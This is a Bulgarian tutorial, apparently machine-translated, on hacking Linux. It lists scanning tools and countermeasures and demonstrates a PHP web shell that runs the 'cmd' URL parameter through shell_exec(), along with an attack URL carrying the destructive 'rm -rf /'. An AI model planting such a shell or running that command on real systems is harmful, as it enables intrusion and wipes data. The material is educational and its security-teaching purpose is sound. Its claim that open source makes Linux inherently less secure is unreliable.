Хакване на Linux OS: Хакване с Ubuntu (урок за команди)
Linux е най-широко използваната сървърна операционна система, особено за уеб сървъри. Той е с отворен код; това означава, че всеки може да има достъп до изходния код. Това я прави по-малко сигурна в сравнение с други операционни системи, тъй като атакуващите могат да проучат изходния код, за да намерят уязвимости. Linux for Hackers е за използване на тези уязвимости за получаване на неоторизиран достъп до система.
В тази статия ще ви запознаем с това какво представлява Linux, неговите уязвимости в сигурността, хакване с Ubuntu и контрамерките, които можете да приложите.
Бърза бележка за Linux
Linux е операционна система с отворен код. Има много дистрибуции на базирани на Linux операционни системи като Redhat, Fedora и Ubuntu, и т.н. За разлика от други операционни системи, Linux е по-малко сигурен, когато става въпрос за сигурност. Това е така, защото изходният код е достъпен безплатно, така че е лесно да се изследва за уязвимости и да се използват в сравнение с други операционни системи, които не са с отворен код. Linux може да се използва като операционна система за сървър, десктоп, таблет или мобилно устройство.
Linux програмите могат да се управляват с помощта на GUI или команди. Linux командите за Kali Linux хакването е по-ефективно и ефикасно в сравнение с използването на GUI. Поради тази причина е полезно да знаете основните Linux команди за хакване.
Обърнете се към тези уроци https://www.guru99.com/unix-linux-tutorial.html за това как да започнете с Kali Linux хакове.
Инструменти за хакване на Linux
- Nessus– този инструмент може да се използва за Ubuntu хакване, сканиране на конфигурационни настройки, корекции и мрежи и т.н. може да се намери на https://www.tenable.com/products/nessus
- NMap. Този инструмент може да се използва за наблюдение на хостове, които работят на сървъра, и услугите, които използват. Може да се използва и за сканиране за портове. Може да се намери на https://nmap.org/
- САРА – SARA е акронимът за асистент по научни изследвания на одитора по сигурността. Както подсказва името, този инструмент може да се използва за одит на мрежи срещу заплахи като SQL Injection, XSS и т.н. може да се намери на http://www-arc.com/sara/sara.html
Горният списък не е изчерпателен; дава ви представа за наличните инструменти за Ubuntu хакване и хакване на Linux системи.
Как да предотвратите хакване на Linux
Linux Hacking се възползва от уязвимостите в операционната система. Една организация може да приеме следната политика, за да се защити от подобни атаки.
- Управление на пластирите– корекции коригират грешки, които нападателите използват, за да компрометират система. Добрата политика за управление на корекциите ще гарантира, че постоянно прилагате подходящи корекции към вашата система.
- Правилна конфигурация на ОС– други подвизи се възползват от слабостите в конфигурацията на сървъра. Неактивните потребителски имена и демони трябва да бъдат деактивирани. Настройките по подразбиране като общи пароли за приложението, потребителски имена по подразбиране и някои номера на портове трябва да бъдат променени.
- Система за откриване на проникване– такива инструменти могат да се използват за откриване на неоторизиран достъп до системата. Някои инструменти имат способността да откриват и предотвратяват подобни атаки.
Хакерска дейност: Хакнете a Ubuntu Linux система, използваща PHP
В този практически сценарий ще научим как да хакваме с Ubuntu и ние ще ви предоставим основна информация за това как можете да използвате PHP за компрометиране на Linux. Няма да се насочваме към жертва. Ако искате да го изпробвате, можете да инсталирате LAMPP на вашата локална машина.
PHP идва с две функции, които могат да се използват за изпълнение на Linux хакерски команди. Има функции exec() и shell_exec(). Функцията exec() връща последния ред от изхода на командата, докато shell_exec() връща целия резултат от командата като низ.
За демонстрационни цели, нека приемем, че мениджърите на атакуващите качват следния файл на уеб сървър.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
ТУК,
Горният скрипт получава командата от променливата GET с име cmd. Командата се изпълнява с помощта на shell_exec() и резултатите се връщат в браузъра.
Горният код може да бъде използван чрез следното URL
http://localhost/cp/konsole.php?cmd=ls%20-l
ТУК,
- „…konsole.php?cmd=ls%20-l“присвоява стойността ls –l на променливата cmd.
Командата в Ubuntu за хакване срещу сървъра ще бъде изпълнен като
shell_exec('ls -l') ;
Изпълнението на горния код на уеб сървър дава резултати, подобни на следните.
Горната команда просто показва файловете в текущата директория и разрешенията
Да предположим, че нападателят подаде следната команда
rm -rf /
ТУК,
- “rm” премахва файловете
- “rf” кара командата rm да се изпълнява в рекурсивен режим. Изтриване на всички папки и файлове
- “/” инструктира командата да започне да изтрива файлове от главната директория
Атаката URL би изглеждало нещо подобно
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Oбобщение
- Linux е популярна операционна система за сървъри, настолни компютри, таблети и мобилни устройства.
- Linux е с отворен код и изходният код може да бъде получен от всеки. Това улеснява откриването на уязвимостите. Това е една от най-добрите операционни системи за хакери.
- Основни и мрежови хакерски команди в Ubuntu са ценни за Linux хакерите.
- Уязвимостта е слабост, която може да бъде използвана за компрометиране на система.
- Добрата сигурност може да помогне за защита на системата от компрометиране от нападател.

